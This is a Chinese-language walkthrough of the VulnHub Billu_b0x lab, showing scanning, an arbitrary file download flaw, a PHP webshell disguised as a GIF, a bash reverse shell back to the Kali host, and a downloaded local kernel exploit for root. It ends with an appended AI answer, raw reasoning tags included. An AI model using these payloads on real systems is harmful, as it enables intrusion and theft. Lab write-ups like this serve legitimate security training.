VulnHub 靶场实战~Billu_b0x

billu_b0x靶场难度:适中;感觉很多东西还没掌握,后期继续完善!

一、环境配置

攻击机:kali (192.168.153.138)

官网下载

靶机:Billu_b0x(192.168.153.149)

官方下载

百度网盘下载

提取码:wxhn(百度网盘下载解压后直接导入vmware就可以了)

攻击机和靶机都设置成nat模式

二、渗透过程

1、发现主机(nmap扫描)

nmap -sP 192.168.153.1/24

2、扫描目标主机开放端口

namp -sS 192.168.153.149

发现目标靶机开放了22、80端口

3、扫描端口开放服务

nmap -sV -T4 -O 192.168.153.136 -p 22,80

访问ip看一下(80是默认端口,访问的时候可以不加也可以加)

页面提示:how me your SQLI skills

尝试了一下万能密码SQL注入,但是没有成功,所以继续找其他思路

4、扫描目录(dirb是kali自带的目录扫描工具)

dirb http://192.168.153.136 /usr/share/wordlists/dirb/big.txt


5、看一下总共有几个可以带来有用的信息

http://192.168.153.149/in.php

http://192.168.153.149/phpmy

http://192.168.153.149/add.php

http://192.168.153.149/test.php

http://192.168.153.149/c.php

http://192.168.153.149/index.php

http://192.168.153.149/show.php

http://192.168.153.149/panel.php

http://192.168.153.149/in

http://192.168.153.136/phpmy

发现一个phpmyadmin的登陆页面,尝试弱口令但是进不去,我们没有账号和密码就先继续看其他目录

 http://192.168.153.136/c.php

空白页面,先放着

同样是空白页面,先放着

http://192.168.153.136/test

提示

'file' parameter is empty. Please provide file path in 'file' parameter

“file”参数为空,请在“file”参数中提供文件路径

尝试使用GET传参访问/etc/passw目录

GET传参失败,试一下POST传参

/etc/passwd的信息被下载下来了,可见此处存在任意文件下载

发现该目录存在任意文件下载漏洞,那么就有思路了,我们把前面几个文件都下载下来看一下,(此处用的是brupsuit抓包测试,也可以直接下载下来)

c.php

账号:billu

密码:b0x_billu

发现了个mysql的账号密码,让我们回到刚才的mysql管理平台页面试一下

成功拿到了登录页面的账号密码,回到web登录页面试一下

成功登录

在show users页面发现文件上传路径

add Users是个上传页面

<?php
system($_GET['cmd']);
?>

我们先上传一个一句话木马文件尝试一下

上传失败,并且给我们提示只能上传png、jpg、gif文件

那么我们就上传一个图片马,并且加上GIF89a绕过文件头检测

上传成功

然后用brupsuit抓show user包执行命令看一下

三、执行命令成功之后下一步就是反弹shell

1、kali命令行里输入nc -lvnp 9999开始监听

2、burp的post请求中执行echo “bash -i >& /dev/tcp/192.168.153.138/9999 0>&1” | bash,(注意要将此命令先经过URL编码才能发送,直接在burpsuit里面的Decoder就可以加密了)

3、反弹shell成功(但是只是普通权限)

4、很明显我们拿到的只是普通权限,接下来就是提权

cat /etc/issue(查看当前系统版本)

Ubuntu 12.04

5、重新在kali打开一个终端,使用 Kali 的漏洞查找工具(searchsploit)找到那个最适合该系统版本的

searchsploit Ubuntu 12.04

6、直接把37292.c文件copy到Apache的根目录下

cd /usr/share/exploitdb/exploits/linux/loca

cp 37292.c /var/www/html

7、开启kali的Apache服务

/etc/init.d/apache2 start

8、这里我们要先切换到临时目录,然后wget下载

cd /tmp
wget http://192.168.153.138/37292.c

9、然后编译执行,成功提权

gcc 37292.c -o abc
./abc

10、虽然已经是root权限但是目前还是半交互式,我们改成全交互式

python -c 'import pty;pty.spawn("/bin/bash")'

<think>好的,我需要处理用户关于下载billu_b0x的请求。首先,用户提到想通过百度网盘下载这个资源,并引用了某个参考来源。根据引用内容,用户可能已经有一个百度网盘的链接,但需要提取码wxhn。不过,我需要验证这个链接是否仍然有效,以及资源是否安全合规。 接下来,我需要考虑用户可能遇到的问题。例如,链接失效、提取码错误,或者下载后的文件无法正确导入VMware。此外,用户可能对设置NAT模式的网络配置有疑问,或者渗透测试过程中遇到技术障碍。 另外,用户的需求可能不仅限于下载,还可能包括如何配置环境和进行后续的渗透测试步骤。因此,生成相关问题时,需要涵盖下载步骤、环境配置、常见问题解决以及实际应用场景。 最后,要确保回答符合系统级指令,正确使用LaTeX格式,并添加引用标识。同时,保持回答结构清晰,分步骤帮助用户解决问题,并保证信息的准确性和安全性。</think>关于billu_b0x靶场资源的下载与使用,根据引用内容中提供的信息[^1],具体操作步骤如下: 1. **百度网盘下载** - 访问百度网盘链接(需自行搜索最新有效链接) - 输入提取码:$wxhn$(注意字母大小写) - 下载后解压得到虚拟机文件 2. **虚拟机配置** ```bash # 设置NAT模式网络 VMware菜单栏 > 编辑 > 虚拟网络编辑器 > 选择NAT模式 ``` 需确保攻击机(如Kali Linux)和靶机使用相同的网络模式,配置示意图: $$ \begin{cases} \text{攻击机IP} \in 192.168.153.0/24\\ \text{靶机IP} \in 192.168.153.0/24 \end{cases} $$ 3. **渗透测试验证** 建议使用Nmap进行基础探测: ```python import nmap scanner = nmap.PortScanner() scanner.scan('192.168.153.0/24', arguments='-sP') ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值